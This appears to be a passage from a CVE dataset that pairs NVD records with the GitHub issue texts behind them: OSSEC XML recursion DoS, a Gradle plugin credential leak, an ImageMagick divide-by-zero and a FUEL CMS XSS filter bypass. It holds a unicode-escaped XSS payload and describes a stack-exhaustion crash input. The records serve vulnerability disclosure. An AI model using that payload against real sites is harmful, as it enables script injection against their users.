#192 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#193 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#194 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#195 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#196 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#197 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#198 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#199 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#200 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#201 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#202 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#203 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#204 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#205 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#206 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#207 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#208 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#209 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#210 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#211 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#212 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#213 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#214 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#215 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#216 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#217 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#218 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#219 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#220 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#221 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#222 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#223 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#224 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#225 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#226 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#227 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#228 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#229 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#230 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#231 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#232 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#233 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#234 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#235 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#236 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#237 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#238 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#239 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#240 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#241 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#242 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#243 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#244 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#245 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#246 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#247 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#248 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
SUMMARY: AddressSanitizer: stack-overflow /software/os_xml/os_xml.c:417 in _getattributes
==171980==ABORTING
root@ubuntu:/software/os_xml#
```
As we can see an unlimited number of recursion calls can be performed, ending on a SIGSEGV (Segmentation fault).
**Attention!**: If a SIGSEGV is not triggered, try adding more `<>` in the payload. The segmentation fault error is because we reach the end of the stack, so it depends on the offset until the end of it, which may differ in your situation.
## ANALYSIS
There exists a non limited recursion in the `_ReadElem()` function:
```c
static int _ReadElem(FILE *fp, unsigned int parent, OS_XML *_lxml)
{
int c;
unsigned int count = 0;
unsigned int _currentlycont = 0;
short int location = -1;
int prevv = 0;
char elem[XML_MAXSIZE + 1];
char cont[XML_MAXSIZE + 1];
char closedelim[XML_MAXSIZE + 1];
memset(elem, '\0', XML_MAXSIZE + 1);
memset(cont, '\0', XML_MAXSIZE + 1);
memset(closedelim, '\0', XML_MAXSIZE + 1);
while ((c = _xml_fgetc(fp)) != EOF) {
if (c == '\\') {
prevv = c;
} else if (prevv == '\\') {
if (c != _R_CONFS) {
prevv = 0;
}
}
/* Max size */
if (count >= XML_MAXSIZE) {
xml_error(_lxml, "XMLERR: String overflow.");
return (-1);
}
/* Check for comments */
if (c == _R_CONFS) {
int r = 0;
if ((r = _oscomment(fp)) < 0) {
xml_error(_lxml, "XMLERR: Comment not closed.");
return (-1);
} else if (r == 1) {
continue;
}
}
/* Real checking */
if ((location == -1) && (prevv == 0)) {
if (c == _R_CONFS) {
if ((c = fgetc(fp)) == '/') {
xml_error(_lxml, "XMLERR: Element not opened.");
return (-1);
} else {
ungetc(c, fp);
}
location = 0;
} else {
continue;
}
}
else if ((location == 0) && ((c == _R_CONFE) || isspace(c))) {
int _ge = 0;
int _ga = 0;
elem[count] = '\0';
/* Remove the / at the end of the element name */
if (count > 0 && elem[count - 1] == '/') {
_ge = '/';
elem[count - 1] = '\0';
}
if (_writememory(elem, XML_ELEM, count + 1, parent, _lxml) < 0) {
return (-1);
}
_currentlycont = _lxml->cur - 1;
if (isspace(c)) {
if ((_ga = _getattributes(fp, parent, _lxml)) < 0) {
return (-1);
}
}
/* If the element is closed already (finished in />) */
if ((_ge == '/') || (_ga == '/')) {
if (_writecontent("\0", 2, _currentlycont, _lxml) < 0) {
return (-1);
}
_lxml->ck[_currentlycont] = 1;
_currentlycont = 0;
count = 0;
location = -1;
memset(elem, '\0', XML_MAXSIZE);
memset(closedelim, '\0', XML_MAXSIZE);
memset(cont, '\0', XML_MAXSIZE);
if (parent > 0) {
return (0);
}
} else {
count = 0;
location = 1;
}
}
else if ((location == 2) && (c == _R_CONFE)) {
closedelim[count] = '\0';
if (strcmp(closedelim, elem) != 0) {
xml_error(_lxml, "XMLERR: Element '%s' not closed.", elem);
return (-1);
}
if (_writecontent(cont, strlen(cont) + 1, _currentlycont, _lxml) < 0) {
return (-1);
}
_lxml->ck[_currentlycont] = 1;
memset(elem, '\0', XML_MAXSIZE);
memset(closedelim, '\0', XML_MAXSIZE);
memset(cont, '\0', XML_MAXSIZE);
_currentlycont = 0;
count = 0;
location = -1;
if (parent > 0) {
return (0);
}
} else if ((location == 1) && (c == _R_CONFS) && (prevv == 0)) {
if ((c = fgetc(fp)) == '/') {
cont[count] = '\0';
count = 0;
location = 2;
} else {
ungetc(c, fp);
ungetc(_R_CONFS, fp);
if (_ReadElem(fp, parent + 1, _lxml) < 0) {
return (-1);
}
count = 0;
}
} else {
if (location == 0) {
elem[count++] = (char) c;
} else if (location == 1) {
cont[count++] = (char) c;
} else if (location == 2) {
closedelim[count++] = (char) c;
}
if ((_R_CONFS == c) && (prevv != 0)) {
prevv = 0;
}
}
}
if (location == -1) {
return (LEOF);
}
xml_error(_lxml, "XMLERR: End of file and some elements were not closed.");
return (-1);
}
```
If we debug it after specifying the crash file as argument:
```
Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c93 in _getattributes ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x000055555555d2a0 → 0x00000000fbad2488
$rbx : 0x0000555555559920 → <__libc_csu_init+0> endbr64
$rcx : 0x152
$rdx : 0x00007fffffffdc70 → 0x0000000000000153
$rsp : 0x7fffff7fe280
$rbp : 0x00007fffff801280 → 0x00007fffff807300 → 0x00007fffff80d380 → 0x00007fffff813400 → 0x00007fffff819480 → 0x00007fffff81f500 → 0x00007fffff825580 → 0x00007fffff82b600
$rsi : 0x152
$rdi : 0x000055555555d2a0 → 0x00000000fbad2488
$rip : 0x0000555555557c93 → <_getattributes+23> or QWORD PTR [rsp], 0x0
$r8 : 0x0000555555599770 → 0x0000000100000001
$r9 : 0x0000555555599780 → 0x0000000100000001
$r10 : 0x000055555555d010 → 0x0006000600060006
$r11 : 0x7fffff7fd280
$r12 : 0x0000555555555320 → <_start+0> endbr64
$r13 : 0x00007fffffffde30 → 0x0000000000000002
$r14 : 0x0
$r15 : 0x0
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
[!] Unmapped address
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x555555557c81 <_getattributes+5> mov rbp, rsp
0x555555557c84 <_getattributes+8> lea r11, [rsp-0x4000]
0x555555557c8c <_getattributes+16> sub rsp, 0x1000
→ 0x555555557c93 <_getattributes+23> or QWORD PTR [rsp], 0x0
0x555555557c98 <_getattributes+28> cmp rsp, r11
0x555555557c9b <_getattributes+31> jne 0x555555557c8c <_getattributes+16>
0x555555557c9d <_getattributes+33> sub rsp, 0x60
0x555555557ca1 <_getattributes+37> mov QWORD PTR [rbp-0x4048], rdi
0x555555557ca8 <_getattributes+44> mov DWORD PTR [rbp-0x404c], esi
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "test", stopped 0x555555557c93 in _getattributes (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555557c93 → _getattributes()
[#1] 0x555555557428 → _ReadElem()
[#2] 0x55555555773d → _ReadElem()
[#3] 0x55555555773d → _ReadElem()
[#4] 0x55555555773d → _ReadElem()
[#5] 0x55555555773d → _ReadElem()
[#6] 0x55555555773d → _ReadElem()
[#7] 0x55555555773d → _ReadElem()
[#8] 0x55555555773d → _ReadElem()
[#9] 0x55555555773d → _ReadElem()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤
```
A SIGSEGV (Segmentation fault) happens when trying to access invalid memory as the `rsp` register contains an address that is not mapped.
## IMPACT
The most common issue with this type of vulnerability is a Denial of Service (DoS) once a crash has been triggered as demonstrated above with the crash PoC.
## SOLUTION
The best solution to this vulnerability is implementing a code that controls the number of allowed recursions, or redesigning the methodology to loop over the XML tags using a `while` or `for` loop instead of recursing if the number of needed iterations is huge, resulting in a Stack exhaustion.
The DoS is performed due to the creation of a new frame in the stack for each new function being called. Creation of a big amount of frames results after a lot of iterations in consuming up the available stack memory, and once reached non-mapped memory a segmentation fault interruption will happen.
An important factor that decreases a lot the needed iterations to finally trigger the bug is the existence of three big stack buffers in the recursive function. Another useful change would be using dynamic memory with `malloc()` or `calloc()` when big amount of space is needed, also it can be reused instead of creating a chunk or stack buffer for each function call.
| os_xml _ReadElem() - Uncontrolled recursion vulnerability leading to DoS (SIGSEGV) | https://api.github.com/repos/ossec/ossec-hids/issues/1953/comments | 3 | 2021-02-23T14:37:16Z | 2022-05-12T08:54:48Z | https://github.com/ossec/ossec-hids/issues/1953 | 814,524,956 | 1,953 | 1,740 |
CVE-2021-21361 | 2021-03-09T01:15:13.230 | The `com.bmuschko:gradle-vagrant-plugin` Gradle plugin contains an information disclosure vulnerability due to the logging of the system environment variables. When this Gradle plugin is executed in public CI/CD, this can lead to sensitive credentials being exposed to malicious actors. This is fixed in version 3.0.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-jpcm-4485-69p7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/bmuschko/gradle-vagrant-plugin/blob/292129f9343d00d391543fae06239e9b0f33db73/src/main/groovy/com/bmuschko/gradle/vagrant/process/GDKExternalProcessExecutor.groovy#L42-L44"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bmuschko/gradle-vagrant-plugin/pull/20"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-jpcm-4485-69p7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/bmuschko/gradle-vagrant-plugin/blob/292129f9343d00d391543fae06239e9b0f33db73/src/main/groovy/com/bmuschko/gradle/vagrant/process/GDKExternalProcessExecutor.groovy#L42-L44"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bmuschko/gradle-vagrant-plugin/issues/19"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bmuschko/gradle-vagrant-plugin/pull/20"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vagrant_project:vagrant:*:*:*:*:*:gradle:*:*",
"matchCriteriaId": "3AFF2CD1-56CD-4765-AF25-F7B928781487",
"versionEndExcluding": "0.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:vagrant_project:vagrant:*:*:*:*:*:gradle:*:*",
"matchCriteriaId": "CF491479-EB43-4F2A-8BDC-5BFB58D25AC4",
"versionEndExcluding": "3.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"532"
] | 532 | https://github.com/bmuschko/gradle-vagrant-plugin/issues/19 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"bmuschko",
"gradle-vagrant-plugin"
] | ## Problem
Currently if `environmentVariables` is set, this will cause the [whole environment from the Gradle process](https://github.com/bmuschko/gradle-vagrant-plugin/blob/630a33b2e16f0f9eced983ec3bfbad289b81201f/src/main/groovy/com/bmuschko/gradle/vagrant/utils/OsUtils.groovy#L28) to be inherited to the vagrant command. This is then [printed on info level to the console log](https://github.com/bmuschko/gradle-vagrant-plugin/blob/292129f9343d00d391543fae06239e9b0f33db73/src/main/groovy/com/bmuschko/gradle/vagrant/process/GDKExternalProcessExecutor.groovy#L43).
## Context
A common pattern for injecting credentials into the build process on build servers is to set them as environment variables on the build tool process. This way e.g. the credentials for deploying to maven central can be passed the Gradle tasks that need them.
So when my build executes a Vagrant task that has some environment variables set and also has reads some credentials from the environment, this may leak the credentials to build scans and the build server log.
## Options
- Remove envp from console output.
- log on debug level - this will prevent the output to show up in build scans. It will not prevent the output to end up in build server logs, if Gradle is configured to log on debug level.
- Add a `verbose` configuration flag to control whether or not the command and environment should be printed to the log. It should default to `false`. | Potential credentials leak when setting environmentVariables | https://api.github.com/repos/bmuschko/gradle-vagrant-plugin/issues/19/comments | 6 | 2021-02-15T18:01:12Z | 2021-03-08T17:45:17Z | https://github.com/bmuschko/gradle-vagrant-plugin/issues/19 | 808,729,863 | 19 | 1,741 |
CVE-2021-20245 | 2021-03-09T19:15:12.500 | A flaw was found in ImageMagick in coders/webp.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. The highest threat from this vulnerability is to system availability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928943"
},
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/3176"
},
{
"source": "secalert@redhat.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00000.html"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928943"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/3176"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00000.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00020.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "465FCAC7-2745-4B78-AF5C-58D7B3A8D424",
"versionEndExcluding": "6.9.11-62",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F0B33DA-57F7-49FF-853A-336B5131B4ED",
"versionEndExcluding": "7.0.10-62",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"369"
] | 369 | https://github.com/ImageMagick/ImageMagick/issues/3176 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | When `image->ticks_per_second` was set to zero, a division by zero error would happen in line 961. So a crafted file may trigger undefined behavior in the form of division by zero. Maybe there need a `PerceptibleReciprocal()` to do division in line 961?
https://github.com/ImageMagick/ImageMagick/blob/74f8868c779a5bde13f594ae12955d5d281ef890/coders/webp.c#L936-L967 | Division by zero in WriteAnimatedWEBPImage() in coders/webp.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/3176/comments | 2 | 2021-02-02T06:03:44Z | 2021-02-17T07:16:38Z | https://github.com/ImageMagick/ImageMagick/issues/3176 | 798,961,516 | 3,176 | 1,742 |
CVE-2020-23721 | 2021-03-10T14:15:12.373 | An issue was discovered in FUEL CMS V1.4.7. An attacker can use a XSS payload and bypass a filter via /fuelCM/fuel/pages/edit/1?lang=english. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/559"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/559"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "E8B64313-C2ED-4400-9EDE-2AC0DB753CBC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/daylightstudio/FUEL-CMS/issues/559 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | HI:
The attacker bypasses the filter In this pages page!
POC:
`"><details/open/ontoggle=\u0061\u006c\u0065\u0072\u0074(/xss/)>`
<img width="842" alt="222" src="https://user-images.githubusercontent.com/12816285/85382827-eb30d780-b571-11ea-8a59-928afc638ae9.png">
<img width="698" alt="333" src="https://user-images.githubusercontent.com/12816285/85382865-f6840300-b571-11ea-93c3-71d4b9c3a41a.png">
and you can fix it!! thank you
| bypass filter XSS vunerability | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/559/comments | 0 | 2020-06-23T08:53:30Z | 2021-05-14T13:59:44Z | https://github.com/daylightstudio/FUEL-CMS/issues/559 | 643,655,458 | 559 | 1,743 |
CVE-2020-23722 | 2021-03-10T14:15:12.453 | An issue was discovered in FUEL CMS 1.4.7. There is a escalation of privilege vulnerability to obtain super admin privilege via the "id" and "fuel_id" parameters. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/560"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/560"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "E8B64313-C2ED-4400-9EDE-2AC0DB753CBC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"639"
] | 639 | https://github.com/daylightstudio/FUEL-CMS/issues/560 | [
